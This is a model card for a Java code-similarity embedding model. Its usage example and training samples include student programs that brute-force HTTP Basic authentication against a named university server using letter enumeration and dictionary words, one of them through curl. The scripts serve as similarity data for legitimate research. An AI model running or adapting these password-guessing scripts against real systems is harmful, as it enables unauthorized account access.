SentenceTransformer based on microsoft/unixcoder-base-unimodal

This is a sentence-transformers model fine-tuned from microsoft/unixcoder-base-unimodal. It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: microsoft/unixcoder-base-unimodal
  • Maximum Sequence Length: 512 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity
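
As a rough illustration of the similarity function listed above, cosine similarity between two vectors can be sketched in plain Python. The helper name cosine_similarity and the toy 3-dimensional vectors are assumptions made for illustration; real embeddings from this model have 768 dimensions.

```python
import math

def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    if len(u) != len(v):
        raise ValueError("vectors must have the same length")
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0.0 or norm_v == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_u * norm_v)

# Toy vectors standing in for embeddings (hypothetical values).
a = [1.0, 2.0, 3.0]
b = [2.0, 4.0, 6.0]   # same direction as a, so the score is close to 1
c = [-3.0, 0.0, 1.0]  # orthogonal to a, so the score is close to 0

print(cosine_similarity(a, b))
print(cosine_similarity(a, c))
```

Because the score depends only on direction, scaling an embedding does not change its similarity to other embeddings.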

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
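
The Pooling module above has pooling_mode_mean_tokens set to True, which means the sentence embedding is the average of the token embeddings. A minimal sketch of that idea, assuming padding positions are excluded through an attention mask, is shown below. The function name mean_pool and the toy 2-dimensional vectors are hypothetical, and the library's own implementation is vectorized and may handle edge cases differently.

```python
def mean_pool(token_embeddings, attention_mask):
    """Average the token vectors whose mask entry is 1, ignoring padding."""
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                summed[i] += value
    if count == 0:
        raise ValueError("attention mask selects no tokens")
    return [total / count for total in summed]

# Three real tokens followed by one padding position (toy values).
tokens = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [9.0, 9.0]]
mask = [1, 1, 1, 0]
print(mean_pool(tokens, mask))  # → [3.0, 4.0]
```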

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-UniXcoder-ST")
# Run inference
sentences = [
    '\npublic class ImageFile\n{\n\tprivate String imageUrl;\n\tprivate int imageSize;\n\n\tpublic ImageFile(String url, int size)\n\t{\n\t\timageUrl=url;\n\t\timageSize=size;\n\t}\n\n\tpublic String getImageUrl()\n\t{\n\t\treturn imageUrl;\n\t}\n\n\tpublic int getImageSize()\n\t{\n\t\treturn imageSize;\n\t}\n}\n',
    'import java.io.*;\nimport java.net.*;\n\npublic class BruteForce {\n  public static void main(String[] args) {\n      BruteForce brute=new BruteForce();\n      brute.start();\n\n\n     }\n\n\npublic void start() {\nchar passwd[]= new char[3];\nString password;\nString username="";\nString auth_data;\nString server_res_code;\nString required_server_res_code="200";\nint cntr=0;\n\ntry {\n\nURL url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\nURLConnection conn=null;\n\n\n           for (int i=65;i<=122;i++)     {\n               if(i==91) { i=i+6; }\n               passwd[0]= (char) i;\n\n           for (int j=65;j<=122;j++)     {\n              if(j==91) { j=j+6; }\n              passwd[1]=(char) j;\n\n            for (int k=65;k<=122;k++)    {\n                if(k==91) { k=k+6; }\n                passwd[2]=(char) k;\n                password=new String(passwd);\n                password=password.trim();\n                auth_data=null;\n                auth_data=username + ":" + password;\n                auth_data=auth_data.trim();\n                auth_data=getBasicAuthData(auth_data);\n                auth_data=auth_data.trim();\n                conn=url.openConnection();\n                conn.setDoInput (true);\n                conn.setDoOutput(true);\n                conn.setRequestProperty("GET", "/SEC/2/ HTTP/1.1");\n                conn.setRequestProperty ("Authorization", auth_data);\n                server_res_code=conn.getHeaderField(0);\n                server_res_code=server_res_code.substring(9,12);\n                server_res_code.trim();\n                cntr++;\n                System.out.println(cntr + " . " + "PASSWORD SEND : " + password + "  SERVER RESPONSE  : " + server_res_code);\n                if( server_res_code.compareTo(required_server_res_code)==0 )\n                {System.out.println("PASSWORD IS :  " + password + "  SERVER RESPONSE  : " + server_res_code );\n                i=j=k=123;}\n                                           }\n\n                                        }\n\n                                    }\n        }\n     catch (Exception e) {\n           System.err.print(e);\n           }\n  }\n\npublic String getBasicAuthData (String getauthdata)    {\n\nchar base64Array [] = {\n      \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n      \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n      \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n      \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n      \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n      \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n      \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n      \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\' } ;\n\n    String encodedString = "";\n    byte bytes [] = getauthdata.getBytes ();\n    int i = 0;\n    int pad = 0;\n    while (i < bytes.length) {\n      byte b1 = bytes [i++];\n      byte b2;\n      byte b3;\n      if (i >= bytes.length) {\n         b2 = 0;\n         b3 = 0;\n         pad = 2;\n         }\n      else {\n         b2 = bytes [i++];\n         if (i >= bytes.length) {\n            b3 = 0;\n            pad = 1;\n            }\n         else\n            b3 = bytes [i++];\n         }\n      byte c1 = (byte)(b1 >> 2);\n      byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n      byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n      byte c4 = (byte)(b3 & 0x3f);\n      encodedString += base64Array [c1];\n      encodedString += base64Array [c2];\n      switch (pad) {\n        case 0:\n         encodedString += base64Array [c3];\n         encodedString += base64Array [c4];\n         break;\n        case 1:\n         encodedString += base64Array [c3];\n         encodedString += "=";\n         break;\n        case 2:\n         encodedString += "==";\n         break;\n       }\n      }\n      return " " + encodedString;\n  }\n}',
    'package java.httputils;\n\nimport java.io.IOException;\nimport java.net.MalformedURLException;\nimport java.sql.Timestamp;\n\n\npublic class RunnableBruteForce extends BruteForce implements Runnable\n{\n    protected int rangeStart, rangeEnd;\n    protected boolean stop = false;\n    \n    public RunnableBruteForce()\n    {\n        super();\n    }\n\n    \n    public void run()\n    {\n        process();\n    }\n\n    public static void main(String[] args)\n    {\n    }\n    \n    public int getRangeEnd()\n    {\n        return rangeEnd;\n    }\n\n    \n    public int getRangeStart()\n    {\n        return rangeStart;\n    }\n\n    \n    public void setRangeEnd(int i)\n    {\n        rangeEnd = i;\n    }\n\n    \n    public void setRangeStart(int i)\n    {\n        rangeStart = i;\n    }\n\n    \n    public boolean isStop()\n    {\n        return stop;\n    }\n\n    \n    public void setStop(boolean b)\n    {\n        stop = b;\n    }\n\n    public void process()\n    {\n        String password = "";\n        \n        System.out.println(Thread.currentThread().getName() +\n                            "->  workload: " +\n                            this.letters[getRangeStart()] + "  " +\n                            this.letters[getRangeEnd() - 1]);\n        setStart(new Timestamp(System.currentTimeMillis()));\n\n        for (int i = getRangeStart();\n            i < getRangeEnd();\n            i++)\n        {\n            System.out.println(Thread.currentThread().getName() +\n                    "-> Trying words beginning with: " +\n                    letters[i]);\n            for (int i2 = 0;\n                i2 < letters.length;\n                i2++)\n            {\n                for (int i3 = 0;\n                    i3 < letters.length;\n                    i3++)\n                {\n                    if (isStop())\n                    {\n                        return;\n                    }\n                    try\n                    {\n                        char [] arr = new char [] {letters[i], letters[i2], letters[i3]};\n                        String pwd = new String(arr);\n                        \n                        if (Thread.currentThread().getName().equals("Thread-1") && pwd.equals("bad"))\n                        {\n                            System.out.println(Thread.currentThread().getName() +\n                                   "-> Trying password: " +\n                                    pwd);\n                        }\n                        attempts++;\n\n                        BasicAuthHttpRequest req =\n                            new BasicAuthHttpRequest(\n                                getURL(),\n                                getUserName(),\n                                pwd);\n                        System.out.println("Got the password");\n                        setPassword(pwd);\n                        setEnd(new Timestamp(System.currentTimeMillis()));\n                        setContent(req.getContent().toString());\n\n                        \n                        this.setChanged();\n                        this.notifyObservers(this.getContent());\n                        return;\n                    }\n                    catch (MalformedURLException e)\n                    {\n                        e.printStackTrace();\n                        return;\n                    }\n                    catch (IOException e)\n                    {\n\n                    }\n                }\n            }\n        }\n\n        \n        setEnd(new Timestamp(System.currentTimeMillis()));\n    }\n\n}\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# (3, 768)

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# torch.Size([3, 3])
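
One possible way to use the 3 x 3 similarity matrix from the snippet above is to rank the distinct pairs by score. The sketch below assumes the matrix has first been converted to nested lists (for example with similarities.tolist()). The function name rank_pairs and the example scores are hypothetical and are not outputs of this model.

```python
def rank_pairs(similarity_matrix):
    """Return (i, j, score) for every pair i < j, highest score first."""
    n = len(similarity_matrix)
    pairs = [
        (i, j, similarity_matrix[i][j])
        for i in range(n)
        for j in range(i + 1, n)
    ]
    return sorted(pairs, key=lambda pair: pair[2], reverse=True)

# Hypothetical scores for three snippets; the diagonal is self-similarity.
scores = [
    [1.00, 0.12, 0.08],
    [0.12, 1.00, 0.57],
    [0.08, 0.57, 1.00],
]
for i, j, score in rank_pairs(scores):
    print(f"snippets {i} and {j}: {score:.2f}")
```

Only the upper triangle is visited because the matrix is symmetric and the diagonal carries no information about pairs.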

Training Details

Training Dataset

Unnamed Dataset

  • Size: 33,411 training samples
  • Columns: sentence_0, sentence_1, and label
  • Approximate statistics based on the first 1000 samples:
    • sentence_0 (string): min 51 tokens, mean 449.02 tokens, max 512 tokens
    • sentence_1 (string): min 51 tokens, mean 464.04 tokens, max 512 tokens
    • label (int): 0: ~99.80%, 1: ~0.20%
  • Samples:
    Sample 1, sentence_0:

    import java.io.*;
    import java.net.*;

    public class BruteForce
    {
    public static void main(String args[]) throws IOException,
    MalformedURLException
    {
    final String username = "";
    final String fullurl = "http://sec-crack.cs.rmit.edu./SEC/2/";

    String temppass;
    String password = "";
    URL url = new URL(fullurl);
    boolean cracked = false;

    String c[] = {"A","B","C","D","E","F","G","H","I","J","K","L","M","N","O",
    "P","Q","R","S","T","U","V","W","X","Y","Z","a","b","c","d",
    "e","f","g","h","i","j","k","l","m","n","o","p","q","r","s",
    "t","u","v","w","x","y","z"};

    startTime = System.currentTimeMillis();

    for(int i = 0; i < 52 && !cracked; i++) {
    temppass = c[i];
    Authenticator.setDefault(new MyAuthenticator(username, temppass));
    try{

    BufferedReader r = ...

    Sample 1, sentence_1:

    import java.net.*;
    import java.io.*;

    public class SendEMail {

    public void SendEMail(){}

    public void sendMail(String recipient,String c, String subject){
    try {

    Socket s = new Socket("yallara.cs.rmit.edu.", 25);
    BufferedReader in = new BufferedReader
    (new InputStreamReader(s.getInputStream(), "8859_1"));
    BufferedWriter out = new BufferedWriter
    (new OutputStreamWriter(s.getOutputStream(), "8859_1"));

    send(in, out, "HELO theWorld");

    send(in, out, "MAIL FROM: ");
    send(in, out, "RCPT : "+recipient);
    send(in, out, "DATA");
    send(out, "Subject: "+ subject);
    send(out, "From: WatchDog.java");
    send (out, "\n");

    BufferedReader reader;
    String line;
    reader = new BufferedReader(new InputStreamReader(new FileInputStream()));
    line = reader.readLine();
    while (line != null){
    send(out, line);
    line = reader.readLine();
    }
    send...

    Sample 1, label: 0

    Sample 2, sentence_0:

    import java.util.*;
    import java.net.*;
    import java.io.*;

    public class Dictionary
    {
    boolean connected = false;
    int counter;

    Vector words = new Vector();

    Dictionary()
    {
    counter = 0;
    this.readWords();
    this.startAttack();
    }

    public void startAttack()
    {
    while(counter {
    connected = sendRequest();
    if(connected == true)
    {
    System.out.print("The password is: ");
    System.out.println((String)words.elementAt(counter-1));
    counter = words.size();
    }
    }
    }

    public void readWords()
    {
    String line;

    try
    {
    BufferedReader buffer = new BufferedReader(
    new FileReader("/usr/share/lib/dict/words"));

    line = buffer.readLine();

    while(line != null)
    {

    if(line.length() <= 3)
    ...

    Sample 2, sentence_1:

    import java.io.*;
    import java.net.*;
    import java.net.URL;
    import java.net.URLConnection;
    import java.util.*;

    public class BruteForce {

    public static void main(String[] args) throws IOException {

    int start , end, total;
    start = System.currentTimeMillis();

    String username = "";
    String password = null;
    String host = "http://sec-crack.cs.rmit.edu./SEC/2/";

    String letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int lettersLen = letters.length();
    int passwordLen=3;

    int passwords=0;
    int twoChar=0;

    url.misc.BASE64Encoder base = new url.misc.BASE64Encoder();

    String authenticate = "";
    String realm = null, domain = null, hostname = null;
    header = null;

    int responseCode;
    String responseMsg;

    int temp1=0;
    int temp2=0;
    int temp3=0;

    for (int a=...

    Sample 2, label: 0

    Sample 3, sentence_0:

    public class SMTPException extends Exception {

    private String msg;

    public SMTPException(String message) {
    msg = message;
    }

    public String getMessage() {
    return msg;
    }
    }

    Sample 3, sentence_1:

    import java.net.*;
    import java.io.*;

    import java.*;
    import java.util.*;

    public class Dictionary {

    private static String commandLine = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";
    private String password;
    private String previous;
    private String url;
    private int startTime;
    private int endTime;
    private int totalTime;
    private float averageTime;
    private boolean finish;
    private Process curl;
    private BufferedReader bf, responseLine;

    public Dictionary() {

    first();
    finish = true;
    previous = "";
    Runtime run = Runtime.getRuntime();
    startTime =new Date().getTime();
    int i=0;
    try {
    try {
    bf = new BufferedReader(new FileReader("words"));
    }
    catch(FileNotFoundException notFound) {
    bf = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));
    }

    while((password = bf.readLine()) != null) {
    if(password....

    Sample 3, label: 0
  • Loss: BatchAllTripletLoss
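
To make the loss named above more concrete, here is a minimal, unvectorized sketch of the batch-all triplet idea from Hermans et al. (2017): every valid (anchor, positive, negative) triplet in a batch contributes max(d(a, p) - d(a, n) + margin, 0), and the result is averaged over the triplets with a positive contribution. Euclidean distance, the margin value of 1.0, and the function names are assumptions made for illustration. The library implementation operates on tensors, and its defaults may differ.

```python
import math

def euclidean(u, v):
    """Euclidean distance between two equal-length vectors."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(u, v)))

def batch_all_triplet_loss(embeddings, labels, margin=1.0):
    """Mean of max(d(a, p) - d(a, n) + margin, 0) over triplets with positive loss."""
    n = len(labels)
    active = []
    for a in range(n):
        for p in range(n):
            # A positive shares the anchor's label but is a different sample.
            if p == a or labels[p] != labels[a]:
                continue
            for neg in range(n):
                # A negative has a different label from the anchor.
                if labels[neg] == labels[a]:
                    continue
                loss = (euclidean(embeddings[a], embeddings[p])
                        - euclidean(embeddings[a], embeddings[neg])
                        + margin)
                if loss > 0.0:
                    active.append(loss)
    return sum(active) / len(active) if active else 0.0

# Toy batch: two samples with label 0 and one with label 1 (hypothetical values).
batch = [[0.0, 0.0], [1.0, 0.0], [1.5, 0.0]]
batch_labels = [0, 0, 1]
print(batch_all_triplet_loss(batch, batch_labels))  # → 1.0
```

In this sketch, a batch whose samples all share one label produces no valid triplets and therefore returns 0.0.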

Training Hyperparameters

Non-Default Hyperparameters

  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • num_train_epochs: 1
  • fp16: True
  • multi_dataset_batch_sampler: round_robin

All Hyperparameters

  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: no
  • prediction_loss_only: True
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 5e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1
  • num_train_epochs: 1
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.0
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: True
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: round_robin
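
The list above gives learning_rate 5e-05, lr_scheduler_type linear, and warmup_steps 0. As a hedged sketch of what a linear schedule with optional warmup computes, the function below decays the rate from its base value to zero over the run. The name linear_lr is hypothetical, and the total of 2089 steps assumes a single device with the listed batch size of 16 and 33,411 training samples.

```python
import math

def linear_lr(step, total_steps, base_lr=5e-05, warmup_steps=0):
    """Linear warmup (if any) followed by linear decay to zero."""
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    remaining = max(0, total_steps - step)
    return base_lr * remaining / max(1, total_steps - warmup_steps)

# Assumed total: one epoch over 33,411 samples in batches of 16 on one device.
total_steps = math.ceil(33_411 / 16)

for step in (0, 500, 1000, 1500, 2000, total_steps):
    print(step, linear_lr(step, total_steps))
```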

Training Logs

Epoch    Step    Training Loss
0.2393   500     0.2443
0.4787   1000    0.2228
0.7180   1500    0.2148
0.9574   2000    0.1666
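
The Epoch column in the log above can be reproduced from the dataset size and batch size reported earlier. The short calculation below assumes training on a single device with no gradient accumulation and with the last partial batch kept, which matches gradient_accumulation_steps 1 and dataloader_drop_last False in the hyperparameter list.

```python
import math

train_samples = 33_411
batch_size = 16  # per_device_train_batch_size; a single device is assumed

# The last partial batch is kept, so round up.
steps_per_epoch = math.ceil(train_samples / batch_size)
print(steps_per_epoch)  # → 2089

# Fraction of the epoch completed at each logged step.
for step in (500, 1000, 1500, 2000):
    print(step, round(step / steps_per_epoch, 4))
```

Under these assumptions the fractions come out to 0.2393, 0.4787, 0.718, and 0.9574, which agrees with the logged values.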

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 4.1.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.7.0
  • Datasets: 3.6.0
  • Tokenizers: 0.21.1
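
To compare a local environment against the versions listed above, a small check along the following lines may help. It is only a sketch: the dictionary keys are the PyPI distribution names assumed to correspond to each entry, and the helper name compare_versions is hypothetical.

```python
from importlib.metadata import PackageNotFoundError, version

# Versions listed in this model card, keyed by assumed PyPI distribution name.
EXPECTED = {
    "sentence-transformers": "4.1.0",
    "transformers": "4.52.4",
    "torch": "2.6.0+cu124",
    "accelerate": "1.7.0",
    "datasets": "3.6.0",
    "tokenizers": "0.21.1",
}

def compare_versions(expected):
    """Map each package to (expected version, installed version or None)."""
    report = {}
    for name, wanted in expected.items():
        try:
            installed = version(name)
        except PackageNotFoundError:
            installed = None  # package is not installed in this environment
        report[name] = (wanted, installed)
    return report

for name, (wanted, installed) in compare_versions(EXPECTED).items():
    status = "ok" if installed == wanted else "differs"
    print(f"{name}: card={wanted} installed={installed} ({status})")
```

A mismatch does not necessarily mean the model will fail to load; the listed versions are simply the ones used for training.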

Citation

BibTeX

Sentence Transformers

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}

BatchAllTripletLoss

@misc{hermans2017defense,
    title={In Defense of the Triplet Loss for Person Re-Identification},
    author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
    year={2017},
    eprint={1703.07737},
    archivePrefix={arXiv},
    primaryClass={cs.CV}
}